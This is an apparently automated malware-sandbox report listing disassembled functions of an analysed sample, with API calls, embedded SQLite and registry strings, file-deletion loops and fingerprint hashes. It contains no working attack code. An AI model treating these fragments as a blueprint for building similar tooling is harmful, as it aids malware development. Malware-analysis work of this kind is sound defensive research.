                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 4066108131-3849865405
                                                                                                                                                • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004082EF
                                                                                                                                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                • memset.MSVCRT ref: 00408362
                                                                                                                                                • memset.MSVCRT ref: 00408377
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ByteCharMultiWide
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 290601579-0
                                                                                                                                                • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                                • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                                                                                                • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040A47B
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                • wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                • wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                • String ID: %s (%s)$YV@
                                                                                                                                                • API String ID: 3979103747-598926743
                                                                                                                                                • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                                                • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                • String ID: Unknown Error$netmsg.dll
                                                                                                                                                • API String ID: 2767993716-572158859
                                                                                                                                                • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                • out of memory, xrefs: 0042F865
                                                                                                                                                • database is already attached, xrefs: 0042F721
                                                                                                                                                • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpymemset
                                                                                                                                                • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                • API String ID: 1297977491-2001300268
                                                                                                                                                • Opcode ID: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                                                • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                • Opcode Fuzzy Hash: bc1e043490782c929c709f26cda1c8b0ebc87db0ce4dfb41b9d8c8297906dfd0
                                                                                                                                                • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                • free.MSVCRT ref: 004185AC
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$AttributesDeleteErrorLastSleep$free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2802642348-0
                                                                                                                                                • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                • String ID: strings
                                                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: -journal$-wal
                                                                                                                                                • API String ID: 438689982-2894717839
                                                                                                                                                • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: gj
                                                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                • memset.MSVCRT ref: 00405455
                                                                                                                                                • memset.MSVCRT ref: 0040546C
                                                                                                                                                • memset.MSVCRT ref: 00405483
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                                                                                • String ID: 6$\
                                                                                                                                                • API String ID: 404372293-1284684873
                                                                                                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1331804452-0
                                                                                                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: advapi32.dll
                                                                                                                                                • API String ID: 2012295524-4050573280
                                                                                                                                                • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                                                                • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                                                                • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                                                                Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                • <%s>, xrefs: 004100A6
                                                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$_snwprintf
                                                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                                                • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                                                • String ID: %2.2X
                                                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                                                • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                                                • API String ID: 999028693-502967061
                                                                                                                                                • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                                                • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                                                • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                                                Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                                                • memset.MSVCRT ref: 0040C439
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                                                • memset.MSVCRT ref: 0040C4D0
                                                                                                                                                • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                                                Memory Dump Source
